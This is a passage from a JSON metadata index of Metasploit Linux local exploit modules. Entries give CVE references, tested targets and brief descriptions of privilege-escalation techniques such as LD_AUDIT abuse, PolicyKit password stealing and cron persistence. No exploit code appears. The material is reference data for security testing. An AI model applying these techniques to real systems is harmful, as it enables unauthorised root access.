"path": "/modules/exploits/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/blueman_set_dhcp_handler_dbus_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/bpf_priv_esc": {
"name": "Linux BPF doubleput UAF Privilege Escalation",
"full_name": "exploit/linux/local/bpf_priv_esc",
"rank": 400,
"disclosure_date": "2016-05-04",
"type": "exploit",
"author": [
"jannh <jannh@google.com>",
"h00die <mike@shorebreaksecurity.com>"
],
"description": "Linux kernel 4.4 < 4.5.5 extended Berkeley Packet Filter (eBPF)\n does not properly reference count file descriptors, resulting\n in a use-after-free, which can be abused to escalate privileges.\n\n The target system must be compiled with `CONFIG_BPF_SYSCALL`\n and must not have `kernel.unprivileged_bpf_disabled` set to 1.\n\n This module has been tested successfully on:\n\n Ubuntu 16.04 (x64) kernel 4.4.0-21-generic (default kernel);\n Ubuntu 16.04 (x64) kernel 4.4.0-38-generic;\n Ubuntu 16.04 (x64) kernel 4.4.0-42-generic;\n Ubuntu 16.04 (x64) kernel 4.4.0-98-generic;\n Ubuntu 16.04 (x64) kernel 4.4.0-140-generic.",
"references": [
"BID-90309",
"CVE-2016-4557",
"EDB-39772",
"URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=808",
"URL-https://usn.ubuntu.com/2965-1/",
"URL-https://launchpad.net/bugs/1578705",
"URL-http://changelogs.ubuntu.com/changelogs/pool/main/l/linux/linux_4.4.0-22.39/changelog",
"URL-https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-4557.html",
"URL-https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux x86",
"Linux x64"
],
"mod_time": "2018-12-15 05:39:50 +0000",
"path": "/modules/exploits/linux/local/bpf_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/bpf_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"double-fdput",
"doubleput.c"
]
}
},
"exploit_linux/local/bpf_sign_extension_priv_esc": {
"name": "Linux BPF Sign Extension Local Privilege Escalation",
"full_name": "exploit/linux/local/bpf_sign_extension_priv_esc",
"rank": 500,
"disclosure_date": "2017-11-12",
"type": "exploit",
"author": [
"Jann Horn",
"bleidl",
"vnik",
"rlarabee",
"h00die",
"bcoles <bcoles@gmail.com>"
],
"description": "Linux kernel prior to 4.14.8 utilizes the Berkeley Packet Filter (BPF)\n which contains a vulnerability where it may improperly perform sign\n extension. This can be utilized to escalate privileges.\n\n The target system must be compiled with BPF support and must not have\n kernel.unprivileged_bpf_disabled set to 1.\n\n This module has been tested successfully on:\n\n Debian 9.0 kernel 4.9.0-3-amd64;\n Deepin 15.5 kernel 4.9.0-deepin13-amd64;\n ElementaryOS 0.4.1 kernel 4.8.0-52-generic;\n Fedora 25 kernel 4.8.6-300.fc25.x86_64;\n Fedora 26 kernel 4.11.8-300.fc26.x86_64;\n Fedora 27 kernel 4.13.9-300.fc27.x86_64;\n Gentoo 2.2 kernel 4.5.2-aufs-r;\n Linux Mint 17.3 kernel 4.4.0-89-generic;\n Linux Mint 18.0 kernel 4.8.0-58-generic;\n Linux Mint 18.3 kernel 4.13.0-16-generic;\n Mageia 6 kernel 4.9.35-desktop-1.mga6;\n Manjaro 16.10 kernel 4.4.28-2-MANJARO;\n Solus 3 kernel 4.12.7-11.current;\n Ubuntu 14.04.1 kernel 4.4.0-89-generic;\n Ubuntu 16.04.2 kernel 4.8.0-45-generic;\n Ubuntu 16.04.3 kernel 4.10.0-28-generic;\n Ubuntu 17.04 kernel 4.10.0-19-generic;\n ZorinOS 12.1 kernel 4.8.0-39-generic.",
"references": [
"BID-102288",
"CVE-2017-16995",
"EDB-44298",
"EDB-45010",
"URL-https://github.com/rlarabee/exploits/blob/master/cve-2017-16995/cve-2017-16995.c",
"URL-https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c",
"URL-https://cyseclabs.com/exploits/upstream44.c",
"URL-https://blog.aquasec.com/ebpf-vulnerability-cve-2017-16995-when-the-doorman-becomes-the-backdoor",
"URL-https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html",
"URL-https://www.debian.org/security/2017/dsa-4073",
"URL-https://usn.ubuntu.com/3523-2/",
"URL-https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-16995.html",
"URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=1454",
"URL-http://openwall.com/lists/oss-security/2017/12/21/2",
"URL-https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=95a762e2c8c942780948091f8f2a4f32fce1ac6f"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2018-12-16 14:11:54 +0000",
"path": "/modules/exploits/linux/local/bpf_sign_extension_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/bpf_sign_extension_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"get-rekt-linux-hardened.c",
"upstream44.c"
]
}
},
"exploit_linux/local/cron_persistence": {
"name": "Cron Persistence",
"full_name": "exploit/linux/local/cron_persistence",
"rank": 600,
"disclosure_date": "1979-07-01",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>"
],
"description": "This module will create a cron or crontab entry to execute a payload.\n The module includes the ability to automatically clean up those entries to prevent multiple executions.\n Note that syslog will receive a copy of the cron entry.",
"references": [
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Cron",
"User Crontab",
"System Crontab"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/local/cron_persistence.rb",
"is_install_path": true,
"ref_name": "linux/local/cron_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/desktop_privilege_escalation": {
"name": "Desktop Linux Password Stealer and Privilege Escalation",
"full_name": "exploit/linux/local/desktop_privilege_escalation",
"rank": 600,
"disclosure_date": "2014-08-07",
"type": "exploit",
"author": [
"Jakob Lell"
],
"description": "This module steals the user password of an administrative user on a desktop Linux system\n when it is entered for unlocking the screen or for doing administrative actions using\n PolicyKit. Then, it escalates to root privileges using sudo and the stolen user password.\n It exploits the design weakness that there is no trusted channel for transferring the\n password from the keyboard to the actual password verification against the shadow file\n (which is running as root since /etc/shadow is only readable to the root user). Both\n screensavers (xscreensaver/gnome-screensaver) and PolicyKit use a component running under\n the current user account to query for the password and then pass it to a setuid-root binary\n to do the password verification. Therefore, it is possible to inject a password stealer\n after compromising the user account. Since sudo requires only the user password (and not\n the root password of the system), stealing the user password of an administrative user\n directly allows escalating to root privileges. Please note, you have to start a handler\n as a background job before running this exploit since the exploit will only create a shell\n when the user actually enters the password (which may be hours after launching the exploit).\n Using exploit/multi/handler with the option ExitOnSession set to false should do the job.",
"references": [
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux x86",
"Linux x86_64"
],
"mod_time": "2018-10-10 14:12:29 +0000",
"path": "/modules/exploits/linux/local/desktop_privilege_escalation.rb",
"is_install_path": true,
"ref_name": "linux/local/desktop_privilege_escalation",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/docker_daemon_privilege_escalation": {
"name": "Docker Daemon Privilege Escalation",
"full_name": "exploit/linux/local/docker_daemon_privilege_escalation",
"rank": 600,
"disclosure_date": "2016-06-28",
"type": "exploit",
"author": [
"forzoni"
],
"description": "This module obtains root privileges from any host account with access to the\n Docker daemon. Usually this includes accounts in the `docker` group.",
"references": [
],
"platform": "Linux",
"arch": "x86, x64, armle, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-11 22:46:58 +0000",
"path": "/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb",
"is_install_path": true,
"ref_name": "linux/local/docker_daemon_privilege_escalation",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/glibc_ld_audit_dso_load_priv_esc": {
"name": "glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation",
"full_name": "exploit/linux/local/glibc_ld_audit_dso_load_priv_esc",
"rank": 600,
"disclosure_date": "2010-10-18",
"type": "exploit",
"author": [
"Tavis Ormandy",
"zx2c4",
"Marco Ivaldi",
"Todor Donev",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on Linux systems by abusing\n a vulnerability in the GNU C Library (glibc) dynamic linker.\n\n glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does not\n properly restrict use of the LD_AUDIT environment variable when loading\n setuid executables. This allows loading arbitrary shared objects from\n the trusted library search path with the privileges of the suid user.\n\n This module uses LD_AUDIT to load the libpcprofile.so shared object,\n distributed with some versions of glibc, and leverages arbitrary file\n creation functionality in the library constructor to write a root-owned\n world-writable file to a system trusted search path (usually /lib).\n The file is then overwritten with a shared object then loaded with\n LD_AUDIT resulting in arbitrary code execution.\n\n This module has been tested successfully on glibc version 2.11.1 on\n Ubuntu 10.04 x86_64 and version 2.7 on Debian 5.0.4 i386.\n\n RHEL 5 is reportedly affected, but untested. Some glibc distributions\n do not contain the libpcprofile.so library required for successful\n exploitation.",
"references": [
"CVE-2010-3847",
"CVE-2010-3856",
"BID-44154",
"BID-44347",
"EDB-15274",
"EDB-15304",
"EDB-18105",
"URL-https://seclists.org/fulldisclosure/2010/Oct/257",
"URL-https://seclists.org/fulldisclosure/2010/Oct/344",
"URL-https://www.ubuntu.com/usn/usn-1009-1",
"URL-https://security-tracker.debian.org/tracker/CVE-2010-3847",
"URL-https://security-tracker.debian.org/tracker/CVE-2010-3856",
"URL-https://access.redhat.com/security/cve/CVE-2010-3847",
"URL-https://access.redhat.com/security/cve/CVE-2010-3856"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Linux x86",
"Linux x64"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/local/glibc_ld_audit_dso_load_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/glibc_ld_audit_dso_load_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/glibc_origin_expansion_priv_esc": {
"name": "glibc '$ORIGIN' Expansion Privilege Escalation",
"full_name": "exploit/linux/local/glibc_origin_expansion_priv_esc",
"rank": 600,
"disclosure_date": "2010-10-18",
"type": "exploit",
"author": [
"Tavis Ormandy",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on Linux systems by abusing\n a vulnerability in the GNU C Library (glibc) dynamic linker.\n\n glibc `ld.so` versions before 2.11.3, and 2.12.x before 2.12.2 do not\n properly restrict use of the `LD_AUDIT` environment variable when loading\n setuid executables, which allows control over the `$ORIGIN` library search\n path resulting in execution of arbitrary shared objects.\n\n This module opens a file descriptor to the specified suid executable via\n a hard link, then replaces the hard link with a shared object before\n instructing the linker to execute the file descriptor, resulting in\n arbitrary code execution.\n\n The specified setuid binary must be readable and located on the same\n file system partition as the specified writable directory.\n\n This module has been tested successfully on:\n\n glibc 2.5 on CentOS 5.4 (x86_64);\n glibc 2.5 on CentOS 5.5 (x86_64);\n glibc 2.12 on Fedora 13 (i386); and\n glibc 2.5-49 on RHEL 5.5 (x86_64).\n\n Some versions of `ld.so`, such as the version shipped with Ubuntu 14,\n hit a failed assertion in `dl_open_worker` causing exploitation to fail.",
"references": [
"CVE-2010-3847",
"BID-44154",
"EDB-15274",
"URL-https://seclists.org/fulldisclosure/2010/Oct/257",
"URL-https://www.ubuntu.com/usn/usn-1009-1",
"URL-https://security-tracker.debian.org/tracker/CVE-2010-3847",
"URL-https://access.redhat.com/security/cve/CVE-2010-3847"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Linux x86",
"Linux x64"
],
"mod_time": "2019-04-18 15:35:37 +0000",
"path": "/modules/exploits/linux/local/glibc_origin_expansion_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/glibc_origin_expansion_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/glibc_realpath_priv_esc": {
"name": "glibc 'realpath()' Privilege Escalation",
"full_name": "exploit/linux/local/glibc_realpath_priv_esc",
"rank": 300,
"disclosure_date": "2018-01-16",
"type": "exploit",
"author": [
"halfdog",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on Linux systems by abusing\n a vulnerability in GNU C Library (glibc) version 2.26 and prior.\n\n This module uses halfdog's RationalLove exploit to exploit a buffer\n underflow in glibc realpath() and create a SUID root shell. The exploit\n has offsets for glibc versions 2.23-0ubuntu9 and 2.24-11+deb9u1.\n\n The target system must have unprivileged user namespaces enabled.\n\n This module has been tested successfully on Ubuntu Linux 16.04.3 (x86_64)\n with glibc version 2.23-0ubuntu9; and Debian 9.0 (x86_64) with glibc\n version 2.24-11+deb9u1.",
"references": [
"BID-102525",
"CVE-2018-1000001",
"EDB-43775",
"URL-https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/",
"URL-http://www.openwall.com/lists/oss-security/2018/01/11/5",
"URL-https://securitytracker.com/id/1040162",
"URL-https://sourceware.org/bugzilla/show_bug.cgi?id=22679",
"URL-https://usn.ubuntu.com/3534-1/",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=1533836"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/local/glibc_realpath_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/glibc_realpath_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"RationalLove.c"
]
}
},
"exploit_linux/local/hp_smhstart": {
"name": "HP System Management Homepage Local Privilege Escalation",
"full_name": "exploit/linux/local/hp_smhstart",
"rank": 300,
"disclosure_date": "2013-03-30",
"type": "exploit",
"author": [
"agix"
],
"description": "Versions of HP System Management Homepage <= 7.1.2 include a setuid root\n smhstart binary which is vulnerable to a local buffer overflow in the SSL_SHARE_BASE_DIR\n environment variable.",
"references": [
"OSVDB-91990"
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP System Management Homepage 7.1.1",
"HP System Management Homepage 7.1.2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/local/hp_smhstart.rb",
"is_install_path": true,
"ref_name": "linux/local/hp_smhstart",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/juju_run_agent_priv_esc": {
"name": "Juju-run Agent Privilege Escalation",
"full_name": "exploit/linux/local/juju_run_agent_priv_esc",
"rank": 600,
"disclosure_date": "2017-04-13",
"type": "exploit",
"author": [
"Ryan Beisner",
"David Ames (@thedac)",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on Juju agent systems\n running the juju-run agent utility.\n\n Juju agent systems running agent tools prior to version 1.25.12,\n 2.0.x before 2.0.4, and 2.1.x before 2.1.3, provide a UNIX domain socket\n to manage software (\"units\") without setting appropriate permissions,\n allowing unprivileged local users to execute arbitrary commands as root.\n\n This module has been tested successfully with Juju agent tools versions\n 1.18.4, 1.25.5 and 1.25.9 on Ubuntu 14.04.1 LTS x86 deployed by Juju\n 1.18.1-trusty-amd64 and 1.25.6-trusty-amd64 on Ubuntu 14.04.1 LTS x86_64.",
"references": [
"CVE-2017-9232",
"BID-98737",
"URL-https://bugs.launchpad.net/juju/+bug/1682411"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/local/juju_run_agent_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/juju_run_agent_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/kloxo_lxsuexec": {
"name": "Kloxo Local Privilege Escalation",
"full_name": "exploit/linux/local/kloxo_lxsuexec",
"rank": 600,
"disclosure_date": "2012-09-18",
"type": "exploit",
"author": [
"HTP",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Kloxo versions 6.1.12 and earlier contain two setuid root binaries,\n lxsuexec and lxrestart, which allow local privilege escalation to root from uid 48\n (Apache by default on CentOS 5.8, the operating system supported by Kloxo).\n This module has been tested successfully with Kloxo 6.1.12 and 6.1.6.",
"references": [
"EDB-25406",
"OSVDB-93287",
"URL-http://roothackers.net/showthread.php?tid=92"
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Kloxo 6.1.12"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/local/kloxo_lxsuexec.rb",
"is_install_path": true,
"ref_name": "linux/local/kloxo_lxsuexec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/lastore_daemon_dbus_priv_esc": {
"name": "lastore-daemon D-Bus Privilege Escalation",
"full_name": "exploit/linux/local/lastore_daemon_dbus_priv_esc",
"rank": 600,
"disclosure_date": "2016-02-02",
"type": "exploit",
"author": [
"King's Way",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on Deepin Linux systems\n by using lastore-daemon to install a package.\n\n The lastore-daemon D-Bus configuration on Deepin Linux permits any\n user in the sudo group to install arbitrary system packages without\n providing a password, resulting in code execution as root. By default,\n the first user created on the system is a member of the sudo group.\n\n This module has been tested successfully with lastore-daemon versions\n 0.9.53-1 on Deepin Linux 15.5 (x64); and\n 0.9.66-1 on Deepin Linux 15.7 (x64).",
"references": [
"EDB-39433",
"URL-https://gist.github.com/bcoles/02aa274ce32dc350e34b6d4d1ad0e0e8"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/local/lastore_daemon_dbus_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/lastore_daemon_dbus_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/libuser_roothelper_priv_esc": {
"name": "Libuser roothelper Privilege Escalation",
"full_name": "exploit/linux/local/libuser_roothelper_priv_esc",
"rank": 500,
"disclosure_date": "2015-07-24",
"type": "exploit",
"author": [
"Qualys",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on Red Hat based Linux\n systems, including RHEL, Fedora and CentOS, by exploiting a newline\n injection vulnerability in libuser and userhelper versions prior to\n 0.56.13-8 and version 0.60 before 0.60-7.\n\n This module makes use of the roothelper.c exploit from Qualys to\n insert a new user with UID=0 in /etc/passwd.\n\n Note, the password for the current user is required by userhelper.\n\n Note, on some systems, such as Fedora 11, the user entry for the\n current user in /etc/passwd will become corrupted and exploitation\n will fail.\n\n This module has been tested successfully on libuser packaged versions\n 0.56.13-4.el6 on CentOS 6.0 (x86_64);\n 0.56.13-5.el6 on CentOS 6.5 (x86_64);\n 0.60-5.el7 on CentOS 7.1-1503 (x86_64);\n 0.56.16-1.fc13 on Fedora 13 (i686);\n 0.59-1.fc19 on Fedora Desktop 19 (x86_64);\n 0.60-3.fc20 on Fedora Desktop 20 (x86_64);\n 0.60-6.fc21 on Fedora Desktop 21 (x86_64);\n 0.60-6.fc22 on Fedora Desktop 22 (x86_64);\n 0.56.13-5.el6 on Red Hat 6.6 (x86_64); and\n 0.60-5.el7 on Red Hat 7.0 (x86_64).\n\n RHEL 5 is vulnerable, however the installed version of glibc (2.5)\n is missing various functions required by roothelper.c.",
"references": [
"EDB-37706",
"CVE-2015-3245",
"CVE-2015-3246",
"BID-76021",
"BID-76022",
"URL-https://seclists.org/oss-sec/2015/q3/185",
"URL-https://access.redhat.com/articles/1537873"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/local/libuser_roothelper_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/libuser_roothelper_priv_esc",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"AKA": [
"roothelper.c"
]
}
},
"exploit_linux/local/nested_namespace_idmap_limit_priv_esc": {
"name": "Linux Nested User Namespace idmap Limit Local Privilege Escalation",
"full_name": "exploit/linux/local/nested_namespace_idmap_limit_priv_esc",
"rank": 500,
"disclosure_date": "2018-11-15",
"type": "exploit",
"author": [
"Jann Horn",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in Linux kernels 4.15.0 to 4.18.18,\n and 4.19.0 to 4.19.1, where broken uid/gid mappings between nested user\n namespaces and kernel uid/gid mappings allow elevation to root\n (CVE-2018-18955).\n\n The target system must have unprivileged user namespaces enabled and\n the newuidmap and newgidmap helpers installed (from uidmap package).\n\n This module has been tested successfully on:\n\n Fedora Workstation 28 kernel 4.16.3-301.fc28.x86_64;\n Kubuntu 18.04 LTS kernel 4.15.0-20-generic (x86_64);\n Linux Mint 19 kernel 4.15.0-20-generic (x86_64);\n Ubuntu Linux 18.04.1 LTS kernel 4.15.0-20-generic (x86_64).",
"references": [
"BID-105941",
"CVE-2018-18955",
"EDB-45886",
"PACKETSTORM-150381",
"URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=1712",
"URL-https://github.com/bcoles/kernel-exploits/tree/master/CVE-2018-18955",
"URL-https://lwn.net/Articles/532593/",
"URL-https://bugs.launchpad.net/bugs/1801924",
"URL-https://people.canonical.com/~ubuntu-security/cve/CVE-2018-18955",
"URL-https://security-tracker.debian.org/tracker/CVE-2018-18955",
"URL-https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d2f007dbe7e4c9583eea6eb04d60001e85c6f1bd",
"URL-https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.18.19",
"URL-https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.19.2"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2018-12-16 14:11:54 +0000",
"path": "/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/nested_namespace_idmap_limit_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"subuid_shell.c"
]
}
},
"exploit_linux/local/netfilter_priv_esc_ipv4": {
"name": "Linux Kernel 4.6.3 Netfilter Privilege Escalation",
"full_name": "exploit/linux/local/netfilter_priv_esc_ipv4",
"rank": 400,
"disclosure_date": "2016-06-03",
"type": "exploit",
"author": [
"h00die <mike@stcyrsecurity.com>",
"vnik"
],
"description": "This module attempts to exploit a netfilter bug on Linux Kernels before 4.6.3, and currently\n only works against Ubuntu 16.04 (not 16.04.1) with kernel\n 4.4.0-21-generic.\n Several conditions have to be met for successful exploitation:\n Ubuntu:\n 1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do so)\n 2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) need to be installed to compile\n Kernel 4.4.0-31-generic and newer are not vulnerable.\n\n We write the ASCII files and compile on the target instead of locally since metasm bombs for not\n having cdefs.h (even if locally installed)",
"references": [
"EDB-40049",
"CVE-2016-4997",
"URL-http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c"
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Ubuntu"
],
"mod_time": "2018-10-10 14:12:29 +0000",
"path": "/modules/exploits/linux/local/netfilter_priv_esc_ipv4.rb",
"is_install_path": true,
"ref_name": "linux/local/netfilter_priv_esc_ipv4",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/network_manager_vpnc_username_priv_esc": {
"name": "Network Manager VPNC Username Privilege Escalation",
"full_name": "exploit/linux/local/network_manager_vpnc_username_priv_esc",
"rank": 600,
"disclosure_date": "2018-07-26",
"type": "exploit",
"author": [
"Denis Andzakovic",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits an injection vulnerability in the Network Manager\n VPNC plugin to gain root privileges.\n\n This module uses a new line injection vulnerability in the configured\n username for a VPN network connection to inject a `Password helper`\n configuration directive into the connection configuration.\n\n The specified helper is executed by Network Manager as root when the\n connection is started.\n\n Network Manager VPNC versions prior to 1.2.6 are vulnerable.\n\n This module has been tested successfully with VPNC versions:\n 1.2.4-4 on Debian 9.0.0 (x64); and\n 1.1.93-1 on Ubuntu Linux 16.04.4 (x64).",
"references": [
"CVE-2018-10900",
"URL-https://seclists.org/oss-sec/2018/q3/51",
"URL-https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc",
"URL-https://gitlab.gnome.org/GNOME/NetworkManager-vpnc/commit/07ac18a32b4",
"URL-https://security-tracker.debian.org/tracker/CVE-2018-10900",
"URL-https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-10900.html",
"URL-https://launchpad.net/ubuntu/+source/network-manager-vpnc/0.9.8.6-1ubuntu2.1",
"URL-https://www.debian.org/security/2018/dsa-4253",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=1605919",
"URL-https://bugzilla.novell.com/show_bug.cgi?id=1101147"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/local/network_manager_vpnc_username_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/network_manager_vpnc_username_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/ntfs3g_priv_esc": {
"name": "Debian/Ubuntu ntfs-3g Local Privilege Escalation",
"full_name": "exploit/linux/local/ntfs3g_priv_esc",
"rank": 400,
"disclosure_date": "2017-01-05",
"type": "exploit",
"author": [
"jannh <jannh@google.com>",
"h00die <mike@shorebreaksecurity.com>"
],
"description": "The ntfs-3g mount helper in Ubuntu 16.04, 16.10, Debian 7, 8, and possibly 9 does not properly sanitize the environment when executing modprobe.\n This can be abused to load a kernel module and execute a binary payload as the root user.",
"references": [
"CVE-2017-0358",
"EDB-41356",
"URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=1072"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux x86",
"Linux x64"
],
"mod_time": "2018-10-10 14:39:07 +0000",
"path": "/modules/exploits/linux/local/ntfs3g_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/ntfs3g_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/overlayfs_priv_esc": {
"name": "Overlayfs Privilege Escalation",
"full_name": "exploit/linux/local/overlayfs_priv_esc",
"rank": 400,
"disclosure_date": "2015-06-16",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>",
"rebel"
],
"description": "This module attempts to exploit two different CVEs related to overlayfs.\n CVE-2015-1328: Ubuntu specific -> 3.13.0-24 (14.04 default) < 3.13.0-55\n 3.16.0-25 (14.10 default) < 3.16.0-41\n 3.19.0-18 (15.04 default) < 3.19.0-21\n CVE-2015-8660:\n Ubuntu:\n 3.19.0-18 < 3.19.0-43\n 4.2.0-18 < 4.2.0-23 (14.04.1, 15.10)\n Fedora:\n < 4.2.8 (vulnerable, un-tested)\n Red Hat:\n < 3.10.0-327 (rhel 6, vulnerable, un-tested)",
"references": [
"EDB-39166",
"EDB-37292",
"CVE-2015-1328",
"CVE-2015-8660"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"CVE-2015-1328",
"CVE-2015-8660"
],
"mod_time": "2018-10-10 14:12:29 +0000",
"path": "/modules/exploits/linux/local/overlayfs_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/overlayfs_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/pkexec": {
"name": "Linux PolicyKit Race Condition Privilege Escalation",
"full_name": "exploit/linux/local/pkexec",
"rank": 500,
"disclosure_date": "2011-04-01",
"type": "exploit",
"author": [
"xi4oyu",
"0a29406d9794e4f9b30b3c5d6702c708"
],
